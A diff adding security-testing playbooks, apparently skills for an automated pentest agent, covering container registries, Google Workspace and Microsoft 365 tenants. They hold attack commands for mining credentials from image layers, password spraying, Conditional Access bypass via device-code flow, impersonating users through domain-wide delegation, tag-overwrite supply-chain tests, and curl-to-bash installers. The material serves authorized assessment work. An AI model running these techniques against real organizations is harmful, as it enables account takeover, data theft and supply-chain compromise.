+skopeo inspect --config docker://registry.example.com/<repo>:<tag> | jq '{User,Entrypoint:.config.Entrypoint,Cmd:.config.Cmd,Env:.config.Env,Labels:.config.Labels}'
+skopeo copy docker://registry.example.com/<repo>:<tag> oci:/tmp/img:<tag>   # offline copy of all layers
+trivy image --scanners vuln,secret,misconfig --format json -o /tmp/trivy.json registry.example.com/<repo>:<tag>
+syft registry.example.com/<repo>:<tag> -o cyclonedx-json=/tmp/sbom.json && grype sbom:/tmp/sbom.json -o table
+```
+
+Mine layers directly for secrets (history-aware — secrets survive in lower layers):
+```
+crane export registry.example.com/<repo>:<tag> - | tar -tvf -                # list flattened FS
+crane config registry.example.com/<repo>:<tag> | jq .history                 # build commands, leaked ARGs
+mkdir -p /tmp/layers && cd /tmp/layers
+crane pull registry.example.com/<repo>:<tag> img.tar && tar xf img.tar
+for l in blobs/sha256/*; do file "$l"; done                                  # extract each gzip layer tar
+trufflehog docker --image registry.example.com/<repo>:<tag> --only-verified  # per-layer verified secrets
+gitleaks dir /tmp/layers/rootfs                                              # after extracting layers
+dive registry.example.com/<repo>:<tag>                                        # interactive layer/wasted-space view
+```
+
+## Methodology
+
+1. **Confirm the registry and auth model.** `GET /v2/` — `200` (open) vs `401 + WWW-Authenticate: Bearer realm=...` (token-gated). Note the realm/service; test whether anonymous `pull` scope is granted.
+2. **Enumerate the namespace.** Pull `/v2/_catalog` (or brute repo names via `ffuf` if disabled), then `tags/list` per repo. Build the full `repo:tag` inventory and resolve each tag to a digest.
+3. **Triage entrypoints/config first.** `skopeo inspect --config` every image: record `User` (root if empty/`0`), `Entrypoint`/`Cmd`, `Env`, `ExposedPorts`, `Labels`. Cheap and high-signal before pulling gigabytes.
+4. **Pull layers offline.** Use `skopeo copy` / `crane pull` to an OCI dir so you can analyze without a daemon and without re-pulling.
+5. **Scan for CVEs.** `trivy image` (or `syft`→`grype`) for OS + language package CVEs; prioritize critical/high with a known exploit and reachable from the entrypoint.
+6. **Mine for secrets across all layers.** `trufflehog docker --only-verified`, `trivy --scanners secret`, `gitleaks` on extracted rootfs. Inspect `history` for `ARG`/`ENV`/`RUN curl ...?token=` leaks. Hunt `.git/`, `.env`, `id_rsa`, `.aws/credentials`, `.npmrc`, `.pypirc`, `.kube/config`, `*.pem`, JWTs.
+7. **Assess misconfig.** Root user, no `USER` directive, broad `ENV` secrets, mutable `:latest` pinning, missing signatures/SBOM, writable setuid binaries, embedded SSH daemons.
+8. **Test write/push.** If push is reachable, validate (carefully) whether you can overwrite a tag or push to a namespace — supply-chain poisoning.
+9. **Validate & PoC.** Extract one verified credential and confirm it authenticates; or show one exploitable CVE reachable from the entrypoint; or demonstrate a tag overwrite in a sandbox repo.
+
+## Key Weaknesses / Techniques
+
+### Anonymous / over-permissive registry access
+Open `/v2/_catalog` or anonymous `pull` scope exposes every internal image. Self-hosted `registry:2` frequently runs with no auth on :5000.
+```
+curl -s http://registry.example.com:5000/v2/_catalog | jq '.repositories[]'
+nuclei -u http://registry.example.com:5000 -tags registry,exposure -silent     # exposed-registry templates
+```
+
+### Secrets baked into layers (the core of this asset)
+Build secrets `ENV`/`ARG`, `COPY . .` of repo roots, and "deleted-but-not-really" files in lower layers.
+```
+trufflehog docker --image <repo>:<tag> --only-verified --json | jq -r 'select(.Verified)|.DetectorName'
+crane config <repo>:<tag> | jq -r '.history[].created_by' | grep -iE 'ARG|ENV|token|key|password|aws|curl .*http'
+# pull a single secret-bearing layer and grep:
+grep -rIaoE '(AKIA[0-9A-Z]{16}|ghp_[A-Za-z0-9]{36}|eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)' /tmp/layers/rootfs
+```
+
+### Exploitable CVEs in base image / runtime
+Stale base images (old `openssl`, `glibc`, `log4j`, `bash`/Shellshock, vulnerable interpreters) reachable from the entrypoint.
+```
+trivy image --scanners vuln --severity CRITICAL,HIGH --ignore-unfixed <repo>:<tag>
+grype <repo>:<tag> --only-fixed -o json | jq '.matches[] | select(.vulnerability.severity=="Critical") | {id:.vulnerability.id, pkg:.artifact.name}'
+```
+Cross-reference the CVE'd package against `Entrypoint`/`Cmd` — a vulnerable library only matters if the running code calls it.
+
+### Misconfigured entrypoint / runs as root
+No `USER` directive (defaults to UID 0), entrypoint shell scripts that `eval` env vars, secrets passed as args visible in `/proc/*/cmdline`.
+```
+skopeo inspect --config <repo>:<tag> | jq '{User:.config.User, Entrypoint:.config.Entrypoint, Cmd:.config.Cmd}'
+# Empty/"0"/"root" User + privileged runtime = container-escape blast radius (see kubernetes skill)
+crane export <repo>:<tag> - | tar -tv | grep -E 'rws|setuid'    # ship-with-setuid binaries
+```
+
+### Source / IP disclosure
+Multi-stage builds that ship the builder stage, `.git/` directories, unminified source, internal hostnames, private package indexes in `.npmrc`/`.pip.conf`.
+```
+crane export <repo>:<tag> - | tar -tv | grep -E '\.git/|\.env$|\.npmrc|\.pypirc|\.kube/config|credentials$'
+semgrep --config auto /tmp/layers/rootfs/app    # source shipped in image
+```
+
+### Unsigned / unverifiable images & push abuse
+No cosign/Notary signature and no provenance attestation means a poisoned image is indistinguishable from a legit one. If push is reachable, a tag can be overwritten.
+```
+cosign verify <repo>:<tag>                       # error => unsigned/unverifiable
+cosign download sbom <repo>:<tag>                # absent SBOM/attestation
+# Validate push reachability against a benign throwaway repo only:
+crane push /tmp/benign.tar registry.example.com/<your-test-namespace>/canary:poc
+```
+
+### Manifest/index quirks
+Multi-arch indexes can hide an extra platform manifest; `:latest` is mutable; digests are not. Always resolve `tag -> @sha256` and test whether overwriting a tag changes what consumers pull.
+
+## Validation
+
+1. **Secret:** extract one credential and prove it authenticates — `aws sts get-caller-identity` for an AWS key, `GET /user` with a `ghp_*`/`gho_*` token, `jwt_tool <token> -V` then a single authenticated request. Use `--only-verified` to avoid reporting dead strings.
+2. **CVE:** show the vulnerable package + version from `trivy`/`grype`, and that it is invoked by the entrypoint (reachable), not merely present. A fixed-version-available, reachable critical is a real finding.
+3. **Misconfig:** show `User` is empty/`0` from the actual config JSON, or that an entrypoint passes a secret on the command line / `eval`s untrusted env.
+4. **Access:** for anonymous-registry findings, show the full `_catalog` listing or a successful pull of an image you should not be able to read. For push, show a digest you wrote to a sandbox repo.
+5. **Reproducibility:** record the exact `repo@sha256:` digest so the finding is pinned and re-verifiable.
+
+## False Positives
+
+- Unverified secret regex hits (test/example keys, placeholders like `AKIAIOSFODNN7EXAMPLE`, dummy JWTs). Confirm with `--only-verified` or live auth before reporting.
+- CVEs in packages that are present but never invoked by the entrypoint, or `--ignore-unfixed` items with no patch — note as informational, not exploitable.
+- `401`/`403` on `/v2/_catalog` or manifests means auth is working; an open `/v2/` root that still gates pulls is not a breach.
+- Public base-image layers (Debian/Alpine official) flagged for shared CVEs that the vendor tracks — deduplicate against the app's own layers.
+- `:latest` mutable tag in a registry that enforces immutable tags / digest-pinned deploys.
+- "Secrets" that are public config (e.g., publishable API keys, Sentry DSNs) intended to be client-visible.
+
+## Chaining & Impact
+
+- Anonymous `_catalog` -> pull internal image -> mine layers -> verified cloud key -> `aws sts`/`gcloud` -> control-plane access (pivot to cloud and kubernetes skills).
+- Registry creds in a layer (`~/.docker/config.json`, `imagePullSecrets`) -> push access -> overwrite `:latest` of a deployed image -> RCE on every node that pulls it (supply-chain).
+- Source/`.git` disclosure -> hardcoded DB/admin creds -> direct data access; or internal hostnames -> expanded SSRF/internal-network targeting.
+- Reachable critical CVE + root entrypoint + privileged k8s runtime -> in-container RCE -> container escape -> node/cluster compromise.
+- Unsigned images + push -> seed a backdoored image that passes review because nothing verifies provenance.
+
+## Pro Tips
+
+1. Always `skopeo inspect --config` before pulling — entrypoint/User/Env triage is free and tells you where to dig.
+2. Secrets hide in *lower* layers even after deletion; scan per-layer (`trufflehog docker`) rather than only the flattened rootfs.
+3. `crane config | jq .history` reverse-engineers the Dockerfile — `RUN curl ...?token=`, `ARG SECRET`, and broken multi-stage builds show up here.
+4. Resolve tags to digests immediately; `:latest` lies, `@sha256:` does not. Report findings against digests.
+5. `--only-verified` (trufflehog) and live auth checks are the difference between a credible report and noise.
+6. When `_catalog` is disabled, brute repo names with `ffuf` against `/v2/FUZZ/tags/list`; org/product/service wordlists from subdomains and JS often hit.
+7. Cross-check every CVE against the entrypoint's reachable code path before calling it exploitable.
+8. ECR/GCR/ACR are just OCI registries — once you have the cloud token (`aws ecr get-login-password`, `gcloud auth print-access-token`, `az acr login`), the same `crane`/`skopeo`/`trivy` flow applies.
+9. Test push against a throwaway namespace only; never overwrite a production tag during assessment — prove the capability, not the damage.
+
+## Summary
+
+A container image is a transparent, immutable archive: assume every secret ever copied in is still recoverable from some layer, every stale package is a CVE, and an empty `USER` plus a careless entrypoint is RCE waiting for the right runtime. Enumerate the registry anonymously, triage configs before pulling, mine all layers for verified secrets, match CVEs to reachable entrypoints, and pin every finding to a digest.

--- a/strix/skills/cloud/google_workspace.md
+++ b/strix/skills/cloud/google_workspace.md
@@ -1,0 +1,199 @@
+---
+name: google_workspace
+description: Google Workspace tenant testing - tenant sharing, OAuth/marketplace apps, SSO/identity exposure, admin roles, and data exfiltration paths
+---
+
+# Google Workspace Security Testing
+
+Google Workspace (formerly G Suite) is the identity and collaboration plane for an organization: Gmail, Drive, Calendar, Groups, the Admin Console, and the Cloud Identity directory all hang off a single tenant keyed by one or more verified DNS domains. The attacker objective is to move from external/low-privilege standing into the tenant's identity layer - by abusing over-broad external sharing, third-party OAuth and Marketplace apps, weak SSO/2SV posture, super-admin role sprawl, and service-account/domain-wide-delegation chains - and ultimately read or exfiltrate org data or impersonate users. This skill covers tenant-level assessment against an authorized engagement; for SSRF-mediated reach to GCP metadata see the ssrf skill, and for raw GCP project audit see prowler/ScoutSuite usage below.
+
+## Attack Surface
+
+**Scope**
+- Tenant identity: Cloud Identity / Workspace directory, super-admin and delegated admin roles
+- Authentication: login flows, 2-Step Verification (2SV) enrollment, SAML/OIDC SSO to third parties, app passwords, OAuth token grants
+- Sharing: Drive/Docs external sharing, "anyone with the link", shared drives, Groups membership and posting policy
+- Third-party access: OAuth-authorized apps, Marketplace apps installed domain-wide, service accounts with domain-wide delegation (DWD)
+- Mail: SPF/DKIM/DMARC posture, spoofing, mail routing/compliance rules, forwarding/delegation
+- API: Admin SDK, Gmail/Drive/Calendar/Directory APIs reachable with a valid token
+
+**External Entry Points (no creds)**
+- Domain/tenant discovery via MX and DNS, federation metadata, GWS-specific endpoints
+- Public Drive links, public Google Groups, public Calendars, published Sites
+- Username/account enumeration and password-spray surface on `accounts.google.com`
+- OAuth consent abuse / phishing app registration (assess workspace app-restriction posture)
+
+**Authenticated Entry Points**
+- A low-privilege user account (most realistic assumed-breach start)
+- A delegated/super admin account (config review)
+- A service-account JSON key with `domain-wide-delegation` (impersonation across the tenant)
+
+## Recon & Enumeration
+
+Install the Workspace-specific tooling not already in the sandbox:
+```
+# GAM / GAMADV-XTD3: scripted Admin SDK + Gmail/Drive client (config-review under admin creds)
+bash <(curl -s -S -L https://git.io/install-gam) -l
+# GCPLoit / gcp_scanner style audit via gcloud + service-account keys
+curl -sSL https://sdk.cloud.google.com | bash && exec -l $SHELL   # installs gcloud
+pip install google-api-python-client google-auth oauthlib requests
+# Cloud posture scanners (also cover Workspace-adjacent GCP orgs)
+pip install prowler && pipx install scoutsuite
+```
+
+Unauthenticated domain/tenant footprinting:
+```
+# Confirm the org uses Google for mail (MX -> google) and find the routing
+dnsx -l domains.txt -mx -resp -silent | grep -i 'google\|aspmx'
+dig +short MX target.tld | grep -i aspmx.l.google.com
+
+# SPF / DKIM / DMARC posture (spoofability + which third parties can send as the domain)
+dig +short TXT target.tld | grep -i 'v=spf1'
+dig +short TXT _dmarc.target.tld
+dig +short TXT google._domainkey.target.tld
+
+# Is the domain federated (external SSO) or native Google login?
+curl -s "https://accounts.google.com/.well-known/openid-configuration" | jq .
+# Workspace SSO / SAML metadata if the org publishes an IdP
+subfinder -d target.tld -silent | httpx -silent -title -tech-detect | grep -iE 'sso|idp|saml|adfs|okta|ping'
+
+# Surface public Google assets indexed for the domain
+nuclei -u "https://sites.google.com" -tags google,exposure -silent   # placeholder; prefer targeted dorks
+```
+
+Account/username enumeration and login posture (rate-limited, authorized only):
+```
+# GHunt: enrich a known Google account (gaia id, public photos, reviews, calendar)
+pipx install ghunt && ghunt email user@target.tld
+# Validate whether an address is a real Google account before any spray
+python3 -c "import requests;print(requests.post('https://accounts.google.com/_/signin/sl/lookup').status_code)"
+```
+
+Authenticated directory + config enumeration (with provided admin or user creds):
+```
+# Under a low-priv user token - what can this identity already see?
+gcloud auth login        # or activate-service-account for a DWD key
+# Directory dump (admin): users, groups, OUs, admin roles, 2SV state
+gam print users fields primaryEmail,suspended,isAdmin,creationTime,lastLoginTime > users.csv
+gam print groups members managers settings > groups.csv
+gam print admins                                  # who holds super-admin / delegated roles
+gam all users print filters                       # mail filters/forwarding pushed by users
+gam print tokens                                  # every OAuth third-party token across the org
+```
+
+## Methodology
+
+1. **Map the tenant** - From DNS/MX confirm Google is authoritative for mail; enumerate every verified domain and subdomain alias. Identify whether login is native Google or federated to an external IdP (changes the auth attack surface entirely).
+2. **Establish standing** - Define your assumed-breach start: external (no creds), low-priv user, delegated admin, or service-account key. Run `gcloud auth list` / `gam info domain` to confirm what the identity already grants.
+3. **Assess authentication posture** - Check tenant-wide 2SV enforcement, allowed 2SV methods (SMS vs security key), legacy/app-password availability, session length, and whether `Less secure apps` or basic-auth IMAP/SMTP is still permitted.
+4. **Enumerate external sharing** - Inventory Drive files/shared drives shared "anyone with the link" or to external domains; check default sharing policy and shared-drive external membership. Enumerate public Groups and their post/join policy.
+5. **Inventory third-party access** - Pull every OAuth token (`gam print tokens`), Marketplace apps installed domain-wide, and service accounts with domain-wide delegation. Map each app's scopes to data it can read (`https://mail.google.com/`, `.../auth/drive`, `.../auth/admin.directory.user`).
+6. **Review identity/admin sprawl** - List super-admins and custom admin roles; flag service accounts holding admin roles, dormant admins, and admins without security keys.
+7. **Test mail abuse** - Verify SPF/DKIM/DMARC strictness, spoofability, and routing/compliance rules that could exfiltrate or silently BCC mail.
+8. **Escalate** - Chain a permissive grant (DWD key, over-scoped OAuth app, super-admin) into cross-user impersonation or org-wide data read, then stop at minimal proof.
+
+## Key Weaknesses / Techniques
+
+### Over-broad external Drive sharing
+Default sharing left at "anyone with the link" or external-domain sharing enabled tenant-wide leaks documents to anyone holding/guessing a link.
+```
+gam config csv_output_row_filter "visibility:regex:anyoneWithLink|anyoneCanFind" redirect csv shares.csv all users print filelist fields id,title,permissions
+# External members on a shared drive
+gam print shareddrives | gam csv - gam user ~owner show drivefileacl ~id
+```
+Validate by opening a sampled link from an unauthenticated browser/`httpx` and confirming content renders without auth.
+
+### Domain-wide delegation (DWD) abuse
+A service-account JSON key with DWD can impersonate ANY user for its granted scopes - effectively a tenant skeleton key. A leaked key (found via trufflehog/gitleaks in repos, CI, or Drive) plus DWD = full impersonation.
+```
+trufflehog filesystem ./repo --only-verified | grep -i 'service_account\|private_key'
+gitleaks detect -s ./repo -v | grep -i 'gcp\|service-account'
+# Confirm a key can impersonate a target user for Gmail read (authorized PoC):
+python3 - <<'PY'
+from google.oauth2 import service_account
+from googleapiclient.discovery import build
+SCOPES=['https://www.googleapis.com/auth/gmail.readonly']
+c=service_account.Credentials.from_service_account_file('key.json',scopes=SCOPES)
+d=c.with_subject('victim@target.tld')          # impersonation via DWD
+g=build('gmail','v1',credentials=d)
+print(g.users().messages().list(userId='me',maxResults=1).execute())
+PY
+```
+
+### Over-scoped / malicious OAuth & Marketplace apps
+Third-party apps granted high-risk scopes (`mail.google.com`, `auth/drive`, `auth/admin.directory.user`) retain access until revoked, even after a password reset. Domain-wide Marketplace installs apply to every user.
+```
+gam print tokens | grep -iE 'mail.google.com|/auth/drive|admin.directory'   # high-risk grants
+gam print tokens query "clientId=<suspect-app-id>"                          # blast radius of one app
+```
+Assess whether app installation is restricted to admins or open to all users (open = consent-phishing risk). For an authorized consent test, register an internal OAuth client and confirm whether the tenant's "trust/restrict third-party apps" policy blocks unverified apps.
+
+### Weak / unenforced 2SV and legacy auth
+2SV not enforced org-wide, SMS allowed, app passwords enabled, or legacy IMAP/SMTP basic-auth still on - all enable post-spray takeover and MFA bypass.
+```
+gam print users fields primaryEmail,isEnrolledIn2Sv,isEnforcedIn2Sv | grep -i ',False'   # users without 2SV
+gam info domain | grep -iE '2sv|less secure'
+```
+
+### Super-admin role sprawl & service-account admins
+Excess super-admins, service accounts holding admin roles, or dormant admins widen the blast radius. A single super-admin compromise = tenant takeover (reset any password, grant DWD, disable logging).
+```
+gam print admins | grep -i 'super'                 # count and identity of super-admins
+gam print users query "isAdmin=True" fields primaryEmail,lastLoginTime   # dormant admins
+```
+
+### Mail spoofing & exfiltration rules
+`v=spf1 ... ~all` (softfail) or `p=none` DMARC permits domain spoofing; tenant-level routing/compliance rules can silently BCC or forward outbound mail.
+```
+# Spoofability check
+swaks --to test@target.tld --from "ceo@target.tld" --server aspmx.l.google.com   # authorized inbound test
+gam print routing                                  # org-level mail routing / split-delivery
+gam all users print forwards                        # user auto-forwards to external domains
+```
+
+### Calendar / Groups information disclosure
+Public calendars leak meeting topics and attendee emails; open Groups leak internal mail and allow external posting (phishing into the org).
+```
+curl -s "https://calendar.google.com/calendar/ical/<id>/public/basic.ics" | head
+gam print groups settings | grep -iE 'whoCanJoin:ANYONE|whoCanPostMessage:ANYONE'
+```
+
+## Validation
+
+1. For external sharing, fetch a sampled "anyone with link" URL from an unauthenticated client and show real content returned (`httpx -u <link> -title -status-code` returning 200 with org data).
+2. For DWD/service-account abuse, demonstrate a single read as an impersonated user (one message subject, one Drive filename) - never bulk-pull, never write.
+3. For OAuth-app risk, prove the granted scope by issuing one read call with the app's token and confirm it succeeds; capture the token's `clientId` and scope list.
+4. For 2SV/legacy gaps, confirm a single authenticated login succeeds without a second factor (or via app password/legacy IMAP) using a test account you control.
+5. For super-admin sprawl, document the exact role bindings (`gam print admins`) rather than asserting; show the account can perform an admin-only read (`gam print users` succeeds).
+6. For spoofing, deliver one benign authorized test mail and show it lands without DKIM/DMARC rejection in headers.
+
+## False Positives
+
+- "anyone with the link" files that are intentionally public templates/marketing assets with no sensitive content - inspect before reporting.
+- OAuth tokens for Google-first-party apps (Gmail mobile, Chrome sync) or admin-vetted business tools - distinguish from unverified third parties.
+- A service-account key existing in a repo that has NO domain-wide delegation and only project-scoped IAM - not a tenant impersonation path; verify DWD is actually configured.
+- 2SV showing "not enrolled" for service/role accounts that are SSO-only or disabled - confirm the account can actually interactively authenticate.
+- DMARC `p=none` on a parking/non-sending subdomain that no one trusts - low impact vs the primary sending domain.
+- Public Group that is a read-only announcement list with moderated posting - `whoCanJoin:ANYONE` alone is not impact if posting is closed.
+- Kibana-style "reachable but 401/403" Admin API endpoints - reachability without a valid token is not a finding.
+
+## Chaining & Impact
+
+- Leaked service-account key + DWD -> impersonate any user -> read all mail/Drive org-wide -> persistent silent data exfiltration.
+- Open app-install policy -> consent-phishing an over-scoped OAuth app -> Gmail/Drive read for every user who consents -> survives password resets until token revoked.
+- Password spray (weak 2SV) -> low-priv user -> harvest internal Groups/Drive shares -> escalate to a delegated admin via reused creds or session theft.
+- Super-admin takeover -> reset any password, grant new DWD, disable login audit logs -> full tenant compromise and stealth persistence.
+- SPF/DMARC weakness -> spoof exec mail -> internal phishing -> credential/consent capture -> back into the tenant.
+- Workspace identity -> federated SSO -> downstream SaaS (Slack/Jira/AWS via SAML) all keyed off the same compromised account = blast radius beyond Google.
+
+## Pro Tips
+
+1. MX records are the fastest tenant fingerprint - `aspmx.l.google.com` confirms Workspace before you touch a login page.
+2. `gam print tokens` is the single highest-value command: it reveals every third-party app's foothold and scope across the whole org in one pass.
+3. Domain-wide delegation is the crown jewel - a DWD key is more dangerous than most super-admin accounts because it impersonates silently with no password reset trail.
+4. Check token *scopes*, not just app names: `mail.google.com` and `auth/drive` are full read/write; `gmail.metadata` is far narrower.
+5. Password resets do NOT revoke OAuth tokens or app passwords - always enumerate and recommend revoking those after any account-compromise finding.
+6. Service accounts don't show in normal user lists - enumerate them separately and check which hold admin roles or DWD; they're the most-forgotten admins.
+7. Audit logs (Admin > Reporting, or `gam report admin/login/drive`) are your validation oracle - a real finding leaves an entry; correlate to prove the action happened server-side.
+8. Federation flips the threat model: if SSO is external (Okta/ADFS), the password attack surface moves off Google - pivot recon to the IdP, but DWD and OAuth risks stay on the Workspace side.
+9. Prefer one-record PoCs (single message, single file) and immediately stop - bulk reads are both noisy and out of proportion for proof.

--- a/strix/skills/cloud/microsoft_365.md
+++ b/strix/skills/cloud/microsoft_365.md
@@ -1,0 +1,178 @@
+---
+name: microsoft_365
+description: Microsoft 365 / Entra ID tenant testing - tenant recon, identity enumeration, OAuth abuse, conditional access bypass, and cross-tenant sharing
+---
+
+# Microsoft 365 Tenant
+
+A Microsoft 365 tenant is the organization's identity and SaaS boundary: Entra ID (formerly Azure AD) for authentication, plus Exchange Online, SharePoint/OneDrive, Teams, and the Graph API behind it. The attacker objective is to move from anonymous external reconnaissance to a valid principal, then escalate that principal through misconfigured conditional access, over-permissioned app registrations and OAuth consent, guest/B2B trust, and external sharing into mailbox, file, and directory data. Almost everything is reachable over the public internet by design, so misconfiguration - not exposure - is the vulnerability.
+
+## Attack Surface
+
+**Anonymous (no credentials)**
+- Tenant existence and brand: `login.microsoftonline.com/getuserrealm.srf`, `/common/GetCredentialType`, `/<domain>/.well-known/openid-configuration`
+- Tenant ID and federation realm from OpenID metadata; associated vanity + `*.onmicrosoft.com` domains
+- User/mailbox existence oracles (timing and `IfExistsResult`); presence of DesktopSSO / Seamless SSO / certificate-based auth
+- Public SharePoint/OneDrive anonymous "Anyone" links; Teams external/federation policy
+
+**Authenticated as a user**
+- Microsoft Graph (`graph.microsoft.com`), Azure AD Graph (legacy), Exchange Web Services / REST
+- Default directory read for members; app registrations, enterprise apps, service principals, role assignments
+- Self-service: app consent, group membership, device join, MFA registration
+
+**Application / workload identity**
+- App registrations and service principals with client secrets/certificates, often over-scoped (Mail.ReadWrite, Directory.ReadWrite.All, Application.ReadWrite.All)
+- Managed identities on Azure resources that can read Key Vault / Graph
+
+**Trust edges**
+- Guest (B2B) accounts and cross-tenant access settings
+- Federated domains (AD FS, third-party IdP) and token-signing trust
+- External sharing of SharePoint/OneDrive; Teams external access (federation)
+
+## Recon & Enumeration
+
+Install the toolchain (Kali / Python):
+```
+pipx install roadrecon                     # ROADtools: Graph/AAD enumeration + GUI
+pip install aadinternals 2>/dev/null; pwsh -c 'Install-Module AADInternals -Force'
+pipx install o365spray                      # tenant/user enum + password spray (managed)
+pip install msgraph-sdk requests msal       # scripted Graph access
+go install github.com/dafthack/MSOLSpray@latest 2>/dev/null  # or use the PS module
+```
+
+Tenant discovery (no auth):
+```
+# OpenID config -> tenant ID, token/authorize endpoints, region
+curl -s "https://login.microsoftonline.com/contoso.com/.well-known/openid-configuration" | jq '{issuer,authorization_endpoint,token_endpoint,tenant_region_scope}'
+
+# Realm: managed vs federated, NamespaceType, FederationBrandName, AuthURL (AD FS host)
+curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=user@contoso.com&xml=1"
+
+# Enumerate all domains attached to the tenant (still works via openid metadata pivot)
+roadrecon auth --device-code      # or supply creds; then:
+roadrecon gather && roadrecon dump
+```
+
+User/mailbox existence oracle (rate-limit aware, use sparingly and only in scope):
+```
+# GetCredentialType: IfExistsResult==0 => account exists, ==1 => not found
+curl -s "https://login.microsoftonline.com/common/GetCredentialType" \
+  -H 'Content-Type: application/json' \
+  -d '{"Username":"alice@contoso.com"}' | jq '{IfExistsResult,ThrottleStatus,EstsProperties}'
+
+# Bulk, throttle-aware
+o365spray --enum -U users.txt --domain contoso.com
+```
+
+Service surface and CVEs once you have hostnames (Exchange on-prem hybrid, ADFS, sharing portals):
+```
+subfinder -d contoso.com -all -silent | httpx -silent -title -tech-detect -sc -o live.txt
+nuclei -l live.txt -tags microsoft,exchange,adfs,owa,sharepoint -s critical,high -rl 40 -c 20 -j -o m365_nuclei.jsonl
+```
+
+Authenticated directory enumeration:
+```
+# ROADtools (read-only Graph dump) -> roadrecon.db, then query with roadrecon-gui
+roadrecon gather
+# AADInternals: tenant info, sync status, CA policies, roles
+pwsh -c 'Import-Module AADInternals; Get-AADIntTenantDetails; Get-AADIntLoginInformation -Domain contoso.com'
+# Direct Graph: who am I, what can I read
+TOKEN=...; curl -s -H "Authorization: Bearer $TOKEN" "https://graph.microsoft.com/v1.0/me/memberOf" | jq .
+curl -s -H "Authorization: Bearer $TOKEN" "https://graph.microsoft.com/v1.0/applications?\$select=appId,displayName,requiredResourceAccess" | jq .
+```
+
+## Methodology
+
+1. **Confirm the tenant.** Pull OpenID config + realm for each in-scope domain; record tenant ID, region, federated vs managed, and the AD FS / third-party IdP host if federated.
+2. **Map the identity surface anonymously.** Enumerate `*.onmicrosoft.com` and vanity domains, brand name, and whether Seamless SSO / CBA is enabled. Build a candidate user list from OSINT (LinkedIn, breach data, email format), then validate existence via GetCredentialType with conservative throttling.
+3. **Get a foothold principal.** Where authorized, password-spray validated users with `o365spray`/`MSOLSpray` (single password, low-and-slow to respect Smart Lockout), or use a captured device-code/consent flow. Always check whether MFA/CA actually gated the successful login.
+4. **Enumerate as the principal.** `roadrecon gather` for a full read-only directory snapshot; review members, groups, roles, app registrations, service principals, conditional access policies, and cross-tenant settings.
+5. **Hunt over-permission.** Identify app registrations/service principals with high Graph application permissions, owners you control, or stale secrets; identify users who can self-grant consent or own privileged groups.
+6. **Test trust edges.** Evaluate guest access scope, external sharing on SharePoint/OneDrive, and Teams federation. Try to read or write resources beyond the principal's intended scope.
+7. **Escalate and chain** (below), validating each step with a concrete PoC, then stop at minimal-impact proof.
+
+## Key Weaknesses / Techniques
+
+### Single-factor / spray-able authentication
+Legacy auth endpoints and per-user MFA gaps let single-factor logins through. Validate with one password across confirmed users:
+```
+o365spray --spray -U valid_users.txt -p 'Season2026!' --domain contoso.com --lockout 1
+# MSOLSpray reports MFA/CA results per account so you can tell a real foothold from an MFA wall
+```
+A 200 with a token = foothold; a token-blocked-by-MFA response is still a *valid credential* finding.
+
+### Conditional Access bypass
+CA policies frequently scope only to browser/`Browser` client app types or named locations. Probe alternate client apps and device states:
+```
+# Device-code flow often dodges location/device CA controls
+curl -s -X POST "https://login.microsoftonline.com/<tenant>/oauth2/v2.0/devicecode" \
+  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&scope=https://graph.microsoft.com/.default offline_access"
+# Then poll the token endpoint with the returned device_code
+```
+Verify by reaching a resource (Graph `/me`) that the policy claimed to protect. Test legacy clients (EWS, IMAP/POP), trusted-IP spoofing via `X-Forwarded-For` where the policy keys on it, and family-of-client-IDs token swapping (FOCI refresh tokens issued for one first-party client redeemed for another).
+
+### Illicit consent grant / OAuth app abuse
+If user consent is allowed for unverified apps, an attacker app can phish delegated scopes (`Mail.Read`, `Files.ReadWrite.All`, `offline_access`) and persist via refresh tokens. Assess the policy and existing grants:
+```
+pwsh -c 'Import-Module AADInternals; Get-AADIntTenantDetails'   # consent settings
+curl -s -H "Authorization: Bearer $TOKEN" "https://graph.microsoft.com/v1.0/oauth2PermissionGrants" | jq '.value[]|{clientId,scope,consentType}'
+```
+Look for `consentType: AllPrincipals` (admin-consented org-wide) on third-party apps and for service principals holding application `Mail.ReadWrite`/`Directory.ReadWrite.All`.
+
+### Over-permissioned app registrations
+A service principal with `RoleManagement.ReadWrite.Directory`, `Application.ReadWrite.All`, or `AppRoleAssignment.ReadWrite.All` is effectively Global Admin. If you control an app's owner account or a leaked client secret, mint app-only tokens:
+```
+curl -s -X POST "https://login.microsoftonline.com/<tenant>/oauth2/v2.0/token" \
+  -d "client_id=<appId>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" | jq .access_token
+```
+Find leaked secrets in code/config with `trufflehog filesystem ./repo` and `gitleaks detect -s ./repo`; Azure DevOps/GitHub pipelines are common sources.
+
+### External sharing & guest over-exposure
+SharePoint/OneDrive "Anyone with the link" creates unauthenticated access; guest accounts may inherit broad directory read. Test:
+```
+# Anonymous link reachability (no auth header)
+curl -s -I "https://contoso-my.sharepoint.com/:b:/g/personal/<token>"
+# As a guest, attempt directory read beyond your intended scope
+curl -s -H "Authorization: Bearer $GUEST_TOKEN" "https://graph.microsoft.com/v1.0/users?\$top=999" | jq '.value|length'
+```
+
+### Federation / token-signing trust (AD FS)
+A federated domain trusts an external token signer. If AD FS keys leak, "Golden SAML" forges any user. Confirm the federation host from realm output and check it for `nuclei -tags adfs` and known CVEs; assess whether a non-existent domain can be added and federated (trust manipulation).
+
+## Validation
+
+1. **Existence claims:** show the raw `IfExistsResult`/realm response and the rate-limit headers, distinguishing a true positive from throttling.
+2. **Foothold:** present a redeemed access token's decoded claims (`jwt_tool <token>` -> `aud`, `scp`/`roles`, `upn`) and one authorized Graph read (`/me`, or a single non-sensitive object) proving the token is live.
+3. **CA bypass:** show the same resource denied via one client path and reached via another, with the token from the bypass path.
+4. **Consent/app-permission:** show the `oauth2PermissionGrants` or `appRoleAssignments` entry plus a single Graph call exercising that exact scope.
+5. **External sharing:** show an unauthenticated 200 to a shared object (read only) or a guest reading beyond scope, then stop.
+Keep PoCs read-only and minimal: one object, one mailbox header, one directory page.
+
+## False Positives
+
+- `IfExistsResult` noise: a `ThrottleStatus != 0` or repeated identical results mean you are being rate-limited, not enumerating - results are unreliable.
+- A successful login that is then **blocked by MFA/CA** is a valid-credential finding but NOT account takeover; label it accurately.
+- App registrations with high *delegated* permissions that no user has consented to are latent, not exploitable, until consent exists.
